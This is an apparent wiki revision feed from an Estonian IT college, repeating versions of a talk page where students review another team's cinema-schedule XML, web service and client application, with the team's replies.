** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Gert Glükmann=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Martin Lensment=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond_&amp;quot;FoodWars&amp;quot;]] ja [[Talk:Meeskond_Tool]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Madis Sildaru=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33758</id>
		<title>Talk:Meeskond &quot;Tyhik&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33758"/>
		<updated>2011-06-05T21:28:25Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Arvustus veebiteenuse klientidele */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
Arvustus&lt;br /&gt;
&lt;br /&gt;
Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis &lt;br /&gt;
&amp;lt;kinod&amp;gt;&lt;br /&gt;
   &amp;lt;kino&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
ning &lt;br /&gt;
&amp;lt;filmid&amp;gt;&lt;br /&gt;
   &amp;lt;film&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.&lt;br /&gt;
Lehe esialgne kujundus on hea, mulle meeldib.&lt;br /&gt;
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.&lt;br /&gt;
&lt;br /&gt;
Indrek Tamm, meeskond Tool, 4.III.2011&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver, D21&lt;br /&gt;
&lt;br /&gt;
Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.&lt;br /&gt;
&lt;br /&gt;
Jaak Lehtsalu D22&lt;br /&gt;
&lt;br /&gt;
XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.&lt;br /&gt;
&lt;br /&gt;
Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.&lt;br /&gt;
&lt;br /&gt;
Jarko Kaskmaa D21&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Teenuse arvamus&lt;br /&gt;
&lt;br /&gt;
Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele&lt;br /&gt;
saaks ehitada ühe korraliku ja kasuliku rakenduse. &lt;br /&gt;
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?&lt;br /&gt;
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes&lt;br /&gt;
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.&lt;br /&gt;
Aga samas, see on minu arvamus. Edu!&lt;br /&gt;
&lt;br /&gt;
Taavi Ilves D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte. &lt;br /&gt;
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks &amp;quot;true&amp;quot;, siis pistetakse&lt;br /&gt;
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid&lt;br /&gt;
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel &amp;quot;anna*&amp;quot; ja &amp;quot;võta*&amp;quot;, kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku &#039;&#039;mergeda&#039;&#039;, näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)&lt;br /&gt;
&lt;br /&gt;
-Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.&lt;br /&gt;
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.&lt;br /&gt;
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult &amp;quot;AnnaTeenus&amp;quot;-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud &amp;quot;estenglish&amp;quot; kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.&lt;br /&gt;
&lt;br /&gt;
Toomas Soha D21&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Arvustus veebiteenuse klientidele==&lt;br /&gt;
&lt;br /&gt;
Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa  nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;) &lt;br /&gt;
&lt;br /&gt;
Madis Sildaru D32&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esiteks ei ole projektil kaasas solution faili, VS ei oska sortsuga ilma selleta midagi peale hakata. Kuna loen faile Notepad++&#039;sis siis, virisen peaasjalikult sortsu kallal :)&lt;br /&gt;
*Sorts on eesti keeles :/&lt;br /&gt;
*Int32.Parse(Request.QueryString[&amp;quot;id&amp;quot;]); stiilis asjad peaks olema try-catch ploki sees.&lt;br /&gt;
* Üldse kogu see data komplekteerimine on väga mitte OOP: kisute ühe andmestruktuuri lahti ja lisati tema objektid kõik eraldi teistesse objektidesse ning siis söödate need objektid alles kuvamise loogikasse. Võiks ju kohe (nt. film.inimesed) Repeaterisse sööta. &lt;br /&gt;
*Kinokava.aspx.cs: treppimine on vale&lt;br /&gt;
*Response.Redirect(&amp;quot;Kinokava.aspx?id=&amp;quot; + id + &amp;quot;&amp;amp;paev=&amp;quot; + paev + &amp;quot;&amp;amp;kuu=&amp;quot; + kuu + &amp;quot;&amp;amp;aasta=&amp;quot; + aasta); selline URI ehitamine võiks näiteks eraldi meetod olla juba, niimoodi on inetu.&lt;br /&gt;
*Kommentaarid puuduvad koodis.&lt;br /&gt;
&lt;br /&gt;
Need olid peamised möödalaskmised mis silma hakkasid. Suures pildis on kena :)&lt;br /&gt;
&lt;br /&gt;
Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Veebiteenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.&lt;br /&gt;
&lt;br /&gt;
Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):&lt;br /&gt;
&lt;br /&gt;
Vähegi suurema projekti puhul ei kasutaks linq&#039;t, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks. &lt;br /&gt;
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).&lt;br /&gt;
&lt;br /&gt;
Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte. &lt;br /&gt;
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.&lt;br /&gt;
&lt;br /&gt;
PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga... &lt;br /&gt;
ei saa öelda, et ma just palju kommentaare oleks leidnud  :)&lt;br /&gt;
&lt;br /&gt;
Priit Siimo&lt;br /&gt;
&lt;br /&gt;
===Kokkuvõttev arvustus===&lt;br /&gt;
&lt;br /&gt;
Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et  millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.&lt;br /&gt;
&lt;br /&gt;
XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.&lt;br /&gt;
&lt;br /&gt;
Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.&lt;br /&gt;
&lt;br /&gt;
Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !&lt;br /&gt;
&lt;br /&gt;
Rauno Rüga, D21&lt;br /&gt;
&lt;br /&gt;
[[User:Rruga|Rruga]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33751</id>
		<title>Talk:Meeskond &quot;Tyhik&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33751"/>
		<updated>2011-06-05T21:01:49Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Klientrakenduse arvustus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
Arvustus&lt;br /&gt;
&lt;br /&gt;
Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis &lt;br /&gt;
&amp;lt;kinod&amp;gt;&lt;br /&gt;
   &amp;lt;kino&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
ning &lt;br /&gt;
&amp;lt;filmid&amp;gt;&lt;br /&gt;
   &amp;lt;film&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.&lt;br /&gt;
Lehe esialgne kujundus on hea, mulle meeldib.&lt;br /&gt;
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.&lt;br /&gt;
&lt;br /&gt;
Indrek Tamm, meeskond Tool, 4.III.2011&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver, D21&lt;br /&gt;
&lt;br /&gt;
Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.&lt;br /&gt;
&lt;br /&gt;
Jaak Lehtsalu D22&lt;br /&gt;
&lt;br /&gt;
XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.&lt;br /&gt;
&lt;br /&gt;
Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.&lt;br /&gt;
&lt;br /&gt;
Jarko Kaskmaa D21&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Teenuse arvamus&lt;br /&gt;
&lt;br /&gt;
Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele&lt;br /&gt;
saaks ehitada ühe korraliku ja kasuliku rakenduse. &lt;br /&gt;
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?&lt;br /&gt;
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes&lt;br /&gt;
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.&lt;br /&gt;
Aga samas, see on minu arvamus. Edu!&lt;br /&gt;
&lt;br /&gt;
Taavi Ilves D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte. &lt;br /&gt;
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks &amp;quot;true&amp;quot;, siis pistetakse&lt;br /&gt;
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid&lt;br /&gt;
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel &amp;quot;anna*&amp;quot; ja &amp;quot;võta*&amp;quot;, kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku &#039;&#039;mergeda&#039;&#039;, näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)&lt;br /&gt;
&lt;br /&gt;
-Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.&lt;br /&gt;
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.&lt;br /&gt;
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult &amp;quot;AnnaTeenus&amp;quot;-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud &amp;quot;estenglish&amp;quot; kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.&lt;br /&gt;
&lt;br /&gt;
Toomas Soha D21&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Arvustus veebiteenuse klientidele==&lt;br /&gt;
&lt;br /&gt;
Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa  nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;) &lt;br /&gt;
&lt;br /&gt;
Madis Sildaru D32&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Veebiteenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.&lt;br /&gt;
&lt;br /&gt;
Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):&lt;br /&gt;
&lt;br /&gt;
Vähegi suurema projekti puhul ei kasutaks linq&#039;t, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks. &lt;br /&gt;
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).&lt;br /&gt;
&lt;br /&gt;
Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte. &lt;br /&gt;
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.&lt;br /&gt;
&lt;br /&gt;
PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga... &lt;br /&gt;
ei saa öelda, et ma just palju kommentaare oleks leidnud  :)&lt;br /&gt;
&lt;br /&gt;
Priit Siimo&lt;br /&gt;
&lt;br /&gt;
===Kokkuvõttev arvustus===&lt;br /&gt;
&lt;br /&gt;
Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et  millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.&lt;br /&gt;
&lt;br /&gt;
XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.&lt;br /&gt;
&lt;br /&gt;
Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.&lt;br /&gt;
&lt;br /&gt;
Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !&lt;br /&gt;
&lt;br /&gt;
Rauno Rüga, D21&lt;br /&gt;
&lt;br /&gt;
[[User:Rruga|Rruga]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33750</id>
		<title>Talk:Meeskond &quot;Tyhik&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33750"/>
		<updated>2011-06-05T21:00:29Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
Arvustus&lt;br /&gt;
&lt;br /&gt;
Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis &lt;br /&gt;
&amp;lt;kinod&amp;gt;&lt;br /&gt;
   &amp;lt;kino&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
ning &lt;br /&gt;
&amp;lt;filmid&amp;gt;&lt;br /&gt;
   &amp;lt;film&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.&lt;br /&gt;
Lehe esialgne kujundus on hea, mulle meeldib.&lt;br /&gt;
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.&lt;br /&gt;
&lt;br /&gt;
Indrek Tamm, meeskond Tool, 4.III.2011&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver, D21&lt;br /&gt;
&lt;br /&gt;
Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.&lt;br /&gt;
&lt;br /&gt;
Jaak Lehtsalu D22&lt;br /&gt;
&lt;br /&gt;
XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.&lt;br /&gt;
&lt;br /&gt;
Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.&lt;br /&gt;
&lt;br /&gt;
Jarko Kaskmaa D21&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Teenuse arvamus&lt;br /&gt;
&lt;br /&gt;
Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele&lt;br /&gt;
saaks ehitada ühe korraliku ja kasuliku rakenduse. &lt;br /&gt;
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?&lt;br /&gt;
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes&lt;br /&gt;
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.&lt;br /&gt;
Aga samas, see on minu arvamus. Edu!&lt;br /&gt;
&lt;br /&gt;
Taavi Ilves D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
